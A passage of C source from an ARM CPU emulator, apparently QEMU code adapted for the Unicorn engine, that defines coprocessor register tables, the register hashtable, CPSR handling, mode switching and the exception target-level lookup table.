ARM_CP_ALIAS | ARM_CP_CONST, .cp = 15, .crn = 0, .crm = 0, .opc1 = 0, .opc2 = 4, .access = PL1_R, .resetvalue = cpu->midr }, { .name = "MIDR", .type = ARM_CP_ALIAS | ARM_CP_CONST, .cp = 15, .crn = 0, .crm = 0, .opc1 = 0, .opc2 = 7, .access = PL1_R, .resetvalue = cpu->midr }, { .name = "REVIDR_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 0, .opc2 = 6, .access = PL1_R, .accessfn = access_aa64_tid1, .type = ARM_CP_CONST, .resetvalue = cpu->revidr }, REGINFO_SENTINEL }; ARMCPRegInfo id_cp_reginfo[] = { /* These are common to v8 and pre-v8 */ { .name = "CTR", .cp = 15, .crn = 0, .crm = 0, .opc1 = 0, .opc2 = 1, .access = PL1_R, .accessfn = ctr_el0_access, .type = ARM_CP_CONST, .resetvalue = cpu->ctr }, { .name = "CTR_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .opc2 = 1, .crn = 0, .crm = 0, .access = PL0_R, .accessfn = ctr_el0_access, .type = ARM_CP_CONST, .resetvalue = cpu->ctr }, /* TCMTR and TLBTR exist in v8 but have no 64-bit versions */ { .name = "TCMTR", .cp = 15, .crn = 0, .crm = 0, .opc1 = 0, .opc2 = 2, .access = PL1_R, .accessfn = access_aa32_tid1, .type = ARM_CP_CONST, .resetvalue = 0 }, REGINFO_SENTINEL }; /* TLBTR is specific to VMSA */ ARMCPRegInfo id_tlbtr_reginfo = { .name = "TLBTR", .cp = 15, .crn = 0, .crm = 0, .opc1 = 0, .opc2 = 3, .access = PL1_R, .accessfn = access_aa32_tid1, .type = ARM_CP_CONST, .resetvalue = 0, }; /* MPUIR is specific to PMSA V6+ */ ARMCPRegInfo id_mpuir_reginfo = { .name = "MPUIR", .cp = 15, .crn = 0, .crm = 0, .opc1 = 0, .opc2 = 4, .access = PL1_R, .type = ARM_CP_CONST, .resetvalue = cpu->pmsav7_dregion << 8 }; ARMCPRegInfo crn0_wi_reginfo = { .name = "CRN0_WI", .cp = 15, .crn = 0, .crm = CP_ANY, .opc1 = CP_ANY, .opc2 = CP_ANY, .access = PL1_W, .type = ARM_CP_NOP | ARM_CP_OVERRIDE }; if (arm_feature(env, ARM_FEATURE_OMAPCP) || arm_feature(env, ARM_FEATURE_STRONGARM)) { ARMCPRegInfo *r; /* Register the blanket "writes ignored" value first to cover the * whole space. Then update the specific ID registers to allow write * access, so that they ignore writes rather than causing them to * UNDEF. */ define_one_arm_cp_reg(cpu, &crn0_wi_reginfo); for (r = id_pre_v8_midr_cp_reginfo; r->type != ARM_CP_SENTINEL; r++) { r->access = PL1_RW; } for (r = id_cp_reginfo; r->type != ARM_CP_SENTINEL; r++) { r->access = PL1_RW; } id_mpuir_reginfo.access = PL1_RW; id_tlbtr_reginfo.access = PL1_RW; } if (arm_feature(env, ARM_FEATURE_V8)) { define_arm_cp_regs(cpu, id_v8_midr_cp_reginfo); } else { define_arm_cp_regs(cpu, id_pre_v8_midr_cp_reginfo); } define_arm_cp_regs(cpu, id_cp_reginfo); if (!arm_feature(env, ARM_FEATURE_PMSA)) { define_one_arm_cp_reg(cpu, &id_tlbtr_reginfo); } else if (arm_feature(env, ARM_FEATURE_V7)) { define_one_arm_cp_reg(cpu, &id_mpuir_reginfo); } } if (arm_feature(env, ARM_FEATURE_MPIDR)) { ARMCPRegInfo mpidr_cp_reginfo[] = { { .name = "MPIDR_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .crn = 0, .crm = 0, .opc1 = 0, .opc2 = 5, .access = PL1_R, .readfn = mpidr_read, .type = ARM_CP_NO_RAW }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, mpidr_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_AUXCR)) { ARMCPRegInfo auxcr_reginfo[] = { { .name = "ACTLR_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 1, .crm = 0, .opc2 = 1, .access = PL1_RW, .accessfn = access_tacr, .type = ARM_CP_CONST, .resetvalue = cpu->reset_auxcr }, { .name = "ACTLR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 0, .opc2 = 1, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "ACTLR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 1, .crm = 0, .opc2 = 1, .access = PL3_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, auxcr_reginfo); if (cpu_isar_feature(aa32_ac2, cpu)) { define_arm_cp_regs(cpu, actlr2_hactlr2_reginfo); } } if (arm_feature(env, ARM_FEATURE_CBAR)) { /* * CBAR is IMPDEF, but common on Arm Cortex-A implementations. * There are two flavours: * (1) older 32-bit only cores have a simple 32-bit CBAR * (2) 64-bit cores have a 64-bit CBAR visible to AArch64, plus a * 32-bit register visible to AArch32 at a different encoding * to the "flavour 1" register and with the bits rearranged to * be able to squash a 64-bit address into the 32-bit view. * We distinguish the two via the ARM_FEATURE_AARCH64 flag, but * in future if we support AArch32-only configs of some of the * AArch64 cores we might need to add a specific feature flag * to indicate cores with "flavour 2" CBAR. */ if (arm_feature(env, ARM_FEATURE_AARCH64)) { /* 32 bit view is [31:18] 0...0 [43:32]. */ uint32_t cbar32 = (extract64(cpu->reset_cbar, 18, 14) << 18) | extract64(cpu->reset_cbar, 32, 12); ARMCPRegInfo cbar_reginfo[] = { { .name = "CBAR", .type = ARM_CP_CONST, .cp = 15, .crn = 15, .crm = 3, .opc1 = 1, .opc2 = 0, .access = PL1_R, .resetvalue = cbar32 }, { .name = "CBAR_EL1", .state = ARM_CP_STATE_AA64, .type = ARM_CP_CONST, .opc0 = 3, .opc1 = 1, .crn = 15, .crm = 3, .opc2 = 0, .access = PL1_R, .resetvalue = cpu->reset_cbar }, REGINFO_SENTINEL }; /* We don't implement a r/w 64 bit CBAR currently */ assert(arm_feature(env, ARM_FEATURE_CBAR_RO)); define_arm_cp_regs(cpu, cbar_reginfo); } else { ARMCPRegInfo cbar = { .name = "CBAR", .cp = 15, .crn = 15, .crm = 0, .opc1 = 4, .opc2 = 0, .access = PL1_R|PL3_W, .resetvalue = cpu->reset_cbar, .fieldoffset = offsetof(CPUARMState, cp15.c15_config_base_address) }; if (arm_feature(env, ARM_FEATURE_CBAR_RO)) { cbar.access = PL1_R; cbar.fieldoffset = 0; cbar.type = ARM_CP_CONST; } define_one_arm_cp_reg(cpu, &cbar); } } if (arm_feature(env, ARM_FEATURE_VBAR)) { ARMCPRegInfo vbar_cp_reginfo[] = { { .name = "VBAR", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .crn = 12, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .writefn = vbar_write, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.vbar_s), offsetof(CPUARMState, cp15.vbar_ns) }, .resetvalue = 0 }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, vbar_cp_reginfo); } /* Generic registers whose values depend on the implementation */ { ARMCPRegInfo sctlr = { .name = "SCTLR", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 1, .crm = 0, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.sctlr_s), offsetof(CPUARMState, cp15.sctlr_ns) }, .writefn = sctlr_write, .resetvalue = cpu->reset_sctlr, .raw_writefn = raw_write, }; if (arm_feature(env, ARM_FEATURE_XSCALE)) { /* Normally we would always end the TB on an SCTLR write, but Linux * arch/arm/mach-pxa/sleep.S expects two instructions following * an MMU enable to execute from cache. Imitate this behaviour. */ sctlr.type |= ARM_CP_SUPPRESS_TB_END; } define_one_arm_cp_reg(cpu, &sctlr); } if (cpu_isar_feature(aa64_lor, cpu)) { define_arm_cp_regs(cpu, lor_reginfo); } if (cpu_isar_feature(aa64_pan, cpu)) { define_one_arm_cp_reg(cpu, &pan_reginfo); } if (cpu_isar_feature(aa64_ats1e1, cpu)) { define_arm_cp_regs(cpu, ats1e1_reginfo); } if (cpu_isar_feature(aa32_ats1e1, cpu)) { define_arm_cp_regs(cpu, ats1cp_reginfo); } if (cpu_isar_feature(aa64_uao, cpu)) { define_one_arm_cp_reg(cpu, &uao_reginfo); } if (arm_feature(env, ARM_FEATURE_EL2) && cpu_isar_feature(aa64_vh, cpu)) { define_arm_cp_regs(cpu, vhe_reginfo); } if (cpu_isar_feature(aa64_sve, cpu)) { define_one_arm_cp_reg(cpu, &zcr_el1_reginfo); if (arm_feature(env, ARM_FEATURE_EL2)) { define_one_arm_cp_reg(cpu, &zcr_el2_reginfo); } else { define_one_arm_cp_reg(cpu, &zcr_no_el2_reginfo); } if (arm_feature(env, ARM_FEATURE_EL3)) { define_one_arm_cp_reg(cpu, &zcr_el3_reginfo); } } #ifdef TARGET_AARCH64 if (cpu_isar_feature(aa64_pauth, cpu)) { define_arm_cp_regs(cpu, pauth_reginfo); } if (cpu_isar_feature(aa64_rndr, cpu)) { define_arm_cp_regs(cpu, rndr_reginfo); } /* Data Cache clean instructions up to PoP */ if (cpu_isar_feature(aa64_dcpop, cpu)) { define_one_arm_cp_reg(cpu, dcpop_reg); if (cpu_isar_feature(aa64_dcpodp, cpu)) { define_one_arm_cp_reg(cpu, dcpodp_reg); } } #endif if (cpu_isar_feature(any_predinv, cpu)) { define_arm_cp_regs(cpu, predinv_reginfo); } if (cpu_isar_feature(any_ccidx, cpu)) { define_arm_cp_regs(cpu, ccsidr2_reginfo); } /* * Register redirections and aliases must be done last, * after the registers from the other extensions have been defined. */ if (arm_feature(env, ARM_FEATURE_EL2) && cpu_isar_feature(aa64_vh, cpu)) { define_arm_vh_e2h_redirects_aliases(cpu); } } static void add_cpreg_to_hashtable(ARMCPU *cpu, const ARMCPRegInfo *r, void *opaque, int state, int secstate, int crm, int opc1, int opc2, const char *name) { /* Private utility function for define_one_arm_cp_reg_with_opaque(): * add a single reginfo struct to the hash table. */ uint32_t *key = g_new(uint32_t, 1); ARMCPRegInfo *r2 = g_memdup(r, sizeof(ARMCPRegInfo)); int is64 = (r->type & ARM_CP_64BIT) ? 1 : 0; int ns = (secstate & ARM_CP_SECSTATE_NS) ? 1 : 0; r2->name = g_strdup(name); /* Reset the secure state to the specific incoming state. This is * necessary as the register may have been defined with both states. */ r2->secure = secstate; if (r->bank_fieldoffsets[0] && r->bank_fieldoffsets[1]) { /* Register is banked (using both entries in array). * Overwriting fieldoffset as the array is only used to define * banked registers but later only fieldoffset is used. */ r2->fieldoffset = r->bank_fieldoffsets[ns]; } if (state == ARM_CP_STATE_AA32) { if (r->bank_fieldoffsets[0] && r->bank_fieldoffsets[1]) { /* If the register is banked then we don't need to migrate or * reset the 32-bit instance in certain cases: * * 1) If the register has both 32-bit and 64-bit instances then we * can count on the 64-bit instance taking care of the * non-secure bank. * 2) If ARMv8 is enabled then we can count on a 64-bit version * taking care of the secure bank. This requires that separate * 32 and 64-bit definitions are provided. */ if ((r->state == ARM_CP_STATE_BOTH && ns) || (arm_feature(&cpu->env, ARM_FEATURE_V8) && !ns)) { r2->type |= ARM_CP_ALIAS; } } else if ((secstate != r->secure) && !ns) { /* The register is not banked so we only want to allow migration of * the non-secure instance. */ r2->type |= ARM_CP_ALIAS; } if (r->state == ARM_CP_STATE_BOTH) { /* We assume it is a cp15 register if the .cp field is left unset. */ if (r2->cp == 0) { r2->cp = 15; } #ifdef HOST_WORDS_BIGENDIAN if (r2->fieldoffset) { r2->fieldoffset += sizeof(uint32_t); } #endif } } if (state == ARM_CP_STATE_AA64) { /* To allow abbreviation of ARMCPRegInfo * definitions, we treat cp == 0 as equivalent to * the value for "standard guest-visible sysreg". * STATE_BOTH definitions are also always "standard * sysreg" in their AArch64 view (the .cp value may * be non-zero for the benefit of the AArch32 view). */ if (r->cp == 0 || r->state == ARM_CP_STATE_BOTH) { r2->cp = CP_REG_ARM64_SYSREG_CP; } *key = ENCODE_AA64_CP_REG(r2->cp, r2->crn, crm, r2->opc0, opc1, opc2); } else { *key = ENCODE_CP_REG(r2->cp, is64, ns, r2->crn, crm, opc1, opc2); } if (opaque) { r2->opaque = opaque; } /* reginfo passed to helpers is correct for the actual access, * and is never ARM_CP_STATE_BOTH: */ r2->state = state; /* Make sure reginfo passed to helpers for wildcarded regs * has the correct crm/opc1/opc2 for this reg, not CP_ANY: */ r2->crm = crm; r2->opc1 = opc1; r2->opc2 = opc2; /* By convention, for wildcarded registers only the first * entry is used for migration; the others are marked as * ALIAS so we don't try to transfer the register * multiple times. Special registers (ie NOP/WFI) are * never migratable and not even raw-accessible. */ if ((r->type & ARM_CP_SPECIAL)) { r2->type |= ARM_CP_NO_RAW; } if (((r->crm == CP_ANY) && crm != 0) || ((r->opc1 == CP_ANY) && opc1 != 0) || ((r->opc2 == CP_ANY) && opc2 != 0)) { r2->type |= ARM_CP_ALIAS | ARM_CP_NO_GDB; } /* Check that raw accesses are either forbidden or handled. Note that * we can't assert this earlier because the setup of fieldoffset for * banked registers has to be done first. */ if (!(r2->type & ARM_CP_NO_RAW)) { // assert(!raw_accessors_invalid(r2)); } /* Overriding of an existing definition must be explicitly * requested. */ if (!(r->type & ARM_CP_OVERRIDE)) { ARMCPRegInfo *oldreg; oldreg = g_hash_table_lookup(cpu->cp_regs, key); if (oldreg && !(oldreg->type & ARM_CP_OVERRIDE)) { fprintf(stderr, "Register redefined: cp=%d %d bit " "crn=%d crm=%d opc1=%d opc2=%d, " "was %s, now %s\n", r2->cp, 32 + 32 * is64, r2->crn, r2->crm, r2->opc1, r2->opc2, oldreg->name, r2->name); g_assert_not_reached(); } } g_hash_table_insert(cpu->cp_regs, key, r2); } void define_one_arm_cp_reg_with_opaque(ARMCPU *cpu, const ARMCPRegInfo *r, void *opaque) { /* Define implementations of coprocessor registers. * We store these in a hashtable because typically * there are less than 150 registers in a space which * is 16*16*16*8*8 = 262144 in size. * Wildcarding is supported for the crm, opc1 and opc2 fields. * If a register is defined twice then the second definition is * used, so this can be used to define some generic registers and * then override them with implementation specific variations. * At least one of the original and the second definition should * include ARM_CP_OVERRIDE in its type bits -- this is just a guard * against accidental use. * * The state field defines whether the register is to be * visible in the AArch32 or AArch64 execution state. If the * state is set to ARM_CP_STATE_BOTH then we synthesise a * reginfo structure for the AArch32 view, which sees the lower * 32 bits of the 64 bit register. * * Only registers visible in AArch64 may set r->opc0; opc0 cannot * be wildcarded. AArch64 registers are always considered to be 64 * bits; the ARM_CP_64BIT* flag applies only to the AArch32 view of * the register, if any. */ int crm, opc1, opc2, state; int crmmin = (r->crm == CP_ANY) ? 0 : r->crm; int crmmax = (r->crm == CP_ANY) ? 15 : r->crm; int opc1min = (r->opc1 == CP_ANY) ? 0 : r->opc1; int opc1max = (r->opc1 == CP_ANY) ? 7 : r->opc1; int opc2min = (r->opc2 == CP_ANY) ? 0 : r->opc2; int opc2max = (r->opc2 == CP_ANY) ? 7 : r->opc2; /* 64 bit registers have only CRm and Opc1 fields */ assert(!((r->type & ARM_CP_64BIT) && (r->opc2 || r->crn))); /* op0 only exists in the AArch64 encodings */ assert((r->state != ARM_CP_STATE_AA32) || (r->opc0 == 0)); /* AArch64 regs are all 64 bit so ARM_CP_64BIT is meaningless */ assert((r->state != ARM_CP_STATE_AA64) || !(r->type & ARM_CP_64BIT)); /* The AArch64 pseudocode CheckSystemAccess() specifies that op1 * encodes a minimum access level for the register. We roll this * runtime check into our general permission check code, so check * here that the reginfo's specified permissions are strict enough * to encompass the generic architectural permission check. */ #ifndef NDEBUG if (r->state != ARM_CP_STATE_AA32) { int mask = 0; switch (r->opc1) { case 0: /* min_EL EL1, but some accessible to EL0 via kernel ABI */ mask = PL0U_R | PL1_RW; break; case 1: case 2: /* min_EL EL1 */ mask = PL1_RW; break; case 3: /* min_EL EL0 */ mask = PL0_RW; break; case 4: case 5: /* min_EL EL2 */ mask = PL2_RW; break; case 6: /* min_EL EL3 */ mask = PL3_RW; break; case 7: /* min_EL EL1, secure mode only (we don't check the latter) */ mask = PL1_RW; break; default: /* broken reginfo with out-of-range opc1 */ assert(false); break; } /* assert our permissions are not too lax (stricter is fine) */ assert((r->access & ~mask) == 0); } #endif /* Check that the register definition has enough info to handle * reads and writes if they are permitted. */ if (!(r->type & (ARM_CP_SPECIAL|ARM_CP_CONST))) { if (r->access & PL3_R) { assert((r->fieldoffset || (r->bank_fieldoffsets[0] && r->bank_fieldoffsets[1])) || r->readfn); } if (r->access & PL3_W) { assert((r->fieldoffset || (r->bank_fieldoffsets[0] && r->bank_fieldoffsets[1])) || r->writefn); } } /* Bad type field probably means missing sentinel at end of reg list */ assert(cptype_valid(r->type)); for (crm = crmmin; crm <= crmmax; crm++) { for (opc1 = opc1min; opc1 <= opc1max; opc1++) { for (opc2 = opc2min; opc2 <= opc2max; opc2++) { for (state = ARM_CP_STATE_AA32; state <= ARM_CP_STATE_AA64; state++) { if (r->state != state && r->state != ARM_CP_STATE_BOTH) { continue; } if (state == ARM_CP_STATE_AA32) { /* Under AArch32 CP registers can be common * (same for secure and non-secure world) or banked. */ char *name; switch (r->secure) { case ARM_CP_SECSTATE_S: case ARM_CP_SECSTATE_NS: add_cpreg_to_hashtable(cpu, r, opaque, state, r->secure, crm, opc1, opc2, r->name); break; default: name = g_strdup_printf("%s_S", r->name); add_cpreg_to_hashtable(cpu, r, opaque, state, ARM_CP_SECSTATE_S, crm, opc1, opc2, name); g_free(name); add_cpreg_to_hashtable(cpu, r, opaque, state, ARM_CP_SECSTATE_NS, crm, opc1, opc2, r->name); break; } } else { /* AArch64 registers get mapped to non-secure instance * of AArch32 */ add_cpreg_to_hashtable(cpu, r, opaque, state, ARM_CP_SECSTATE_NS, crm, opc1, opc2, r->name); } } } } } } void define_arm_cp_regs_with_opaque(ARMCPU *cpu, const ARMCPRegInfo *regs, void *opaque) { /* Define a whole list of registers */ const ARMCPRegInfo *r; for (r = regs; r->type != ARM_CP_SENTINEL; r++) { define_one_arm_cp_reg_with_opaque(cpu, r, opaque); } } /* * Modify ARMCPRegInfo for access from userspace. * * This is a data driven modification directed by * ARMCPRegUserSpaceInfo. All registers become ARM_CP_CONST as * user-space cannot alter any values and dynamic values pertaining to * execution state are hidden from user space view anyway. */ void modify_arm_cp_regs(ARMCPRegInfo *regs, const ARMCPRegUserSpaceInfo *mods) { const ARMCPRegUserSpaceInfo *m; ARMCPRegInfo *r; for (m = mods; m->name; m++) { GPatternSpec *pat = NULL; if (m->is_glob) { pat = g_pattern_spec_new(m->name); } for (r = regs; r->type != ARM_CP_SENTINEL; r++) { if (pat && g_pattern_match_string(pat, r->name)) { r->type = ARM_CP_CONST; r->access = PL0U_R; r->resetvalue = 0; /* continue */ } else if (strcmp(r->name, m->name) == 0) { r->type = ARM_CP_CONST; r->access = PL0U_R; r->resetvalue &= m->exported_bits; r->resetvalue |= m->fixed_bits; break; } } if (pat) { g_pattern_spec_free(pat); } } } const ARMCPRegInfo *get_arm_cp_reginfo(GHashTable *cpregs, uint32_t encoded_cp) { return g_hash_table_lookup(cpregs, &encoded_cp); } void arm_cp_write_ignore(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Helper coprocessor write function for write-ignore registers */ } uint64_t arm_cp_read_zero(CPUARMState *env, const ARMCPRegInfo *ri) { /* Helper coprocessor write function for read-as-zero registers */ return 0; } void arm_cp_reset_ignore(CPUARMState *env, const ARMCPRegInfo *opaque) { /* Helper coprocessor reset function for do-nothing-on-reset registers */ } static int bad_mode_switch(CPUARMState *env, int mode, CPSRWriteType write_type) { /* Return true if it is not valid for us to switch to * this CPU mode (ie all the UNPREDICTABLE cases in * the ARM ARM CPSRWriteByInstr pseudocode). */ /* Changes to or from Hyp via MSR and CPS are illegal. */ if (write_type == CPSRWriteByInstr && ((env->uncached_cpsr & CPSR_M) == ARM_CPU_MODE_HYP || mode == ARM_CPU_MODE_HYP)) { return 1; } switch (mode) { case ARM_CPU_MODE_USR: return 0; case ARM_CPU_MODE_SYS: case ARM_CPU_MODE_SVC: case ARM_CPU_MODE_ABT: case ARM_CPU_MODE_UND: case ARM_CPU_MODE_IRQ: case ARM_CPU_MODE_FIQ: /* Note that we don't implement the IMPDEF NSACR.RFR which in v7 * allows FIQ mode to be Secure-only. (In v8 this doesn't exist.) */ /* If HCR.TGE is set then changes from Monitor to NS PL1 via MSR * and CPS are treated as illegal mode changes. */ if (write_type == CPSRWriteByInstr && (env->uncached_cpsr & CPSR_M) == ARM_CPU_MODE_MON && (arm_hcr_el2_eff(env) & HCR_TGE)) { return 1; } return 0; case ARM_CPU_MODE_HYP: return !arm_feature(env, ARM_FEATURE_EL2) || arm_current_el(env) < 2 || arm_is_secure_below_el3(env); case ARM_CPU_MODE_MON: return arm_current_el(env) < 3; default: return 1; } } uint32_t cpsr_read(CPUARMState *env) { int ZF; ZF = (env->ZF == 0); return env->uncached_cpsr | (env->NF & 0x80000000) | (ZF << 30) | (env->CF << 29) | ((env->VF & 0x80000000) >> 3) | (env->QF << 27) | (env->thumb << 5) | ((env->condexec_bits & 3) << 25) | ((env->condexec_bits & 0xfc) << 8) | (env->GE << 16) | (env->daif & CPSR_AIF); } void cpsr_write(CPUARMState *env, uint32_t val, uint32_t mask, CPSRWriteType write_type) { uint32_t changed_daif; if (mask & CPSR_NZCV) { env->ZF = (~val) & CPSR_Z; env->NF = val; env->CF = (val >> 29) & 1; env->VF = (val << 3) & 0x80000000; } if (mask & CPSR_Q) env->QF = ((val & CPSR_Q) != 0); if (mask & CPSR_T) env->thumb = ((val & CPSR_T) != 0); if (mask & CPSR_IT_0_1) { env->condexec_bits &= ~3; env->condexec_bits |= (val >> 25) & 3; } if (mask & CPSR_IT_2_7) { env->condexec_bits &= 3; env->condexec_bits |= (val >> 8) & 0xfc; } if (mask & CPSR_GE) { env->GE = (val >> 16) & 0xf; } /* In a V7 implementation that includes the security extensions but does * not include Virtualization Extensions the SCR.FW and SCR.AW bits control * whether non-secure software is allowed to change the CPSR_F and CPSR_A * bits respectively. * * In a V8 implementation, it is permitted for privileged software to * change the CPSR A/F bits regardless of the SCR.AW/FW bits. */ if (write_type != CPSRWriteByUnicorn && write_type != CPSRWriteRaw && !arm_feature(env, ARM_FEATURE_V8) && arm_feature(env, ARM_FEATURE_EL3) && !arm_feature(env, ARM_FEATURE_EL2) && !arm_is_secure(env)) { changed_daif = (env->daif ^ val) & mask; if (changed_daif & CPSR_A) { /* Check to see if we are allowed to change the masking of async * abort exceptions from a non-secure state. */ if (!(env->cp15.scr_el3 & SCR_AW)) { qemu_log_mask(LOG_GUEST_ERROR, "Ignoring attempt to switch CPSR_A flag from " "non-secure world with SCR.AW bit clear\n"); mask &= ~CPSR_A; } } if (changed_daif & CPSR_F) { /* Check to see if we are allowed to change the masking of FIQ * exceptions from a non-secure state. */ if (!(env->cp15.scr_el3 & SCR_FW)) { qemu_log_mask(LOG_GUEST_ERROR, "Ignoring attempt to switch CPSR_F flag from " "non-secure world with SCR.FW bit clear\n"); mask &= ~CPSR_F; } /* Check whether non-maskable FIQ (NMFI) support is enabled. * If this bit is set software is not allowed to mask * FIQs, but is allowed to set CPSR_F to 0. */ if ((A32_BANKED_CURRENT_REG_GET(env, sctlr) & SCTLR_NMFI) && (val & CPSR_F)) { qemu_log_mask(LOG_GUEST_ERROR, "Ignoring attempt to enable CPSR_F flag " "(non-maskable FIQ [NMFI] support enabled)\n"); mask &= ~CPSR_F; } } } env->daif &= ~(CPSR_AIF & mask); env->daif |= val & CPSR_AIF & mask; if (write_type != CPSRWriteRaw && ((env->uncached_cpsr ^ val) & mask & CPSR_M)) { if ((env->uncached_cpsr & CPSR_M) == ARM_CPU_MODE_USR) { /* Note that we can only get here in USR mode if this is a * gdb stub write; for this case we follow the architectural * behaviour for guest writes in USR mode of ignoring an attempt * to switch mode. (Those are caught by translate.c for writes * triggered by guest instructions.) */ // Unicorn: No, it can also be uc_reg_write, let user switch registers banks. if (write_type == CPSRWriteByUnicorn) { switch_mode(env, val & CPSR_M); } else { mask &= ~CPSR_M; } } else if (bad_mode_switch(env, val & CPSR_M, write_type)) { /* Attempt to switch to an invalid mode: this is UNPREDICTABLE in * v7, and has defined behaviour in v8: * + leave CPSR.M untouched * + allow changes to the other CPSR fields * + set PSTATE.IL * For user changes via the GDB stub, we don't set PSTATE.IL, * as this would be unnecessarily harsh for a user error. */ mask &= ~CPSR_M; if (write_type != CPSRWriteByGDBStub && arm_feature(env, ARM_FEATURE_V8)) { mask |= CPSR_IL; val |= CPSR_IL; } qemu_log_mask(LOG_GUEST_ERROR, "Illegal AArch32 mode switch attempt from %s to %s\n", aarch32_mode_name(env->uncached_cpsr), aarch32_mode_name(val)); } else { qemu_log_mask(CPU_LOG_INT, "%s %s to %s PC 0x%" PRIx32 "\n", write_type == CPSRWriteExceptionReturn ? "Exception return from AArch32" : "AArch32 mode switch from", aarch32_mode_name(env->uncached_cpsr), aarch32_mode_name(val), env->regs[15]); switch_mode(env, val & CPSR_M); } } mask &= ~CACHED_CPSR_BITS; env->uncached_cpsr = (env->uncached_cpsr & ~mask) | (val & mask); } /* Sign/zero extend */ uint32_t HELPER(sxtb16)(uint32_t x) { uint32_t res; res = (uint16_t)(int8_t)x; res |= (uint32_t)(int8_t)(x >> 16) << 16; return res; } uint32_t HELPER(uxtb16)(uint32_t x) { uint32_t res; res = (uint16_t)(uint8_t)x; res |= (uint32_t)(uint8_t)(x >> 16) << 16; return res; } int32_t HELPER(sdiv)(int32_t num, int32_t den) { if (den == 0) return 0; if (num == INT_MIN && den == -1) return INT_MIN; return num / den; } uint32_t HELPER(udiv)(uint32_t num, uint32_t den) { if (den == 0) return 0; return num / den; } uint32_t HELPER(rbit)(uint32_t x) { return revbit32(x); } static void switch_mode(CPUARMState *env, int mode) { int old_mode; int i; old_mode = env->uncached_cpsr & CPSR_M; if (mode == old_mode) return; if (old_mode == ARM_CPU_MODE_FIQ) { memcpy (env->fiq_regs, env->regs + 8, 5 * sizeof(uint32_t)); memcpy (env->regs + 8, env->usr_regs, 5 * sizeof(uint32_t)); } else if (mode == ARM_CPU_MODE_FIQ) { memcpy (env->usr_regs, env->regs + 8, 5 * sizeof(uint32_t)); memcpy (env->regs + 8, env->fiq_regs, 5 * sizeof(uint32_t)); } i = bank_number(old_mode); env->banked_r13[i] = env->regs[13]; env->banked_spsr[i] = env->spsr; i = bank_number(mode); env->regs[13] = env->banked_r13[i]; env->spsr = env->banked_spsr[i]; env->banked_r14[r14_bank_number(old_mode)] = env->regs[14]; env->regs[14] = env->banked_r14[r14_bank_number(mode)]; } /* Physical Interrupt Target EL Lookup Table * * [ From ARM ARM section G1.13.4 (Table G1-15) ] * * The below multi-dimensional table is used for looking up the target * exception level given numerous condition criteria. Specifically, the * target EL is based on SCR and HCR routing controls as well as the * currently executing EL and secure state. * * Dimensions: * target_el_table[2][2][2][2][2][4] * | | | | | +--- Current EL * | | | | +------ Non-secure(0)/Secure(1) * | | | +--------- HCR mask override * | | +------------ SCR exec state control * | +--------------- SCR mask override * +------------------ 32-bit(0)/64-bit(1) EL3 * * The table values are as such: * 0-3 = EL0-EL3 * -1 = Cannot occur * * The ARM ARM target EL table includes entries indicating that an "exception * is not taken". The two cases where this is applicable are: * 1) An exception is taken from EL3 but the SCR does not have the exception * routed to EL3. * 2) An exception is taken from EL2 but the HCR does not have the exception * routed to EL2. * In these two cases, the below table contain a target of EL1. This value is * returned as it is expected that the consumer of the table data will check * for "target EL >= current EL" to ensure the exception is not taken. * * SCR HCR * 64 EA AMO From * BIT IRQ IMO Non-secure Secure * EL3 FIQ RW FMO EL0 EL1 EL2 EL3 EL0 EL1 EL2 EL3 */ static const int8_t target_el_table[2][2][2][2][2][4] = { {{{{/* 0 0 0 0 */{ 1, 1, 2, -1 },{ 3, -1, -1, 3 },}, {/* 0 0 0 1 */{ 2, 2, 2, -1 },{ 3, -1, -1, 3 },},}, {{/* 0 0 1 0 */{ 1, 1, 2, -1 },{ 3, -1, -1, 3 },}, {/* 0 0 1 1 */{ 2, 2, 2, -1 },{ 3, -1, -1, 3 },},},}, {{{/* 0 1 0 0 */{ 3, 3, 3, -1 },{ 3, -1, -1, 3 },}, {/* 0 1 0 1 */{ 3, 3, 3, -1 },{ 3, -1, -1, 3 },},}, {{/* 0 1 1 0 */{ 3, 3, 3, -1 },{ 3, -1, -1, 3 },}, {/* 0 1 1 1 */{ 3, 3, 3, -1 },{ 3, -1, -1, 3 },},},},}, {{{{/* 1 0 0 0 */{ 1, 1, 2, -1 },{ 1, 1, -1, 1 },}, {/* 1 0 0 1 */{ 2, 2, 2, -1 },{ 1, 1, -1, 1 },},}, {{/* 1 0 1 0 */{ 1, 1, 1, -1 },{ 1, 1, -1, 1 },}, {/* 1 0 1 1 */{ 2, 2, 2, -1 },{ 1, 1, -1, 1 },},},}, {{{/* 1 1 0 0 */{ 3, 3, 3, -1 },{ 3, 3, -1, 3 },}, {/* 1 1 0 1 */{ 3, 3, 3, -1 },{ 3, 3, -1, 3 },},}, {{/* 1 1 1 0 */{ 3, 3, 3, -1 },{ 3, 3, -1, 3 },}, {/* 1 1 1 1 */{ 3, 3, 3, -1 },{ 3, 3, -1, 3 },},},},}, }; /* * Determine the target EL for physical exceptions */ uint32_t arm_phys_excp_target_el(CPUState *cs, uint32_t excp_idx, uint32_t cur_el, bool secure) { CPUARMState *env = cs->env_ptr; bool rw; bool scr; bool hcr; int target_el; /* Is the highest EL AArch64? */ bool is64 = arm_feature(env, ARM_FEATURE_AARCH64); uint64_t 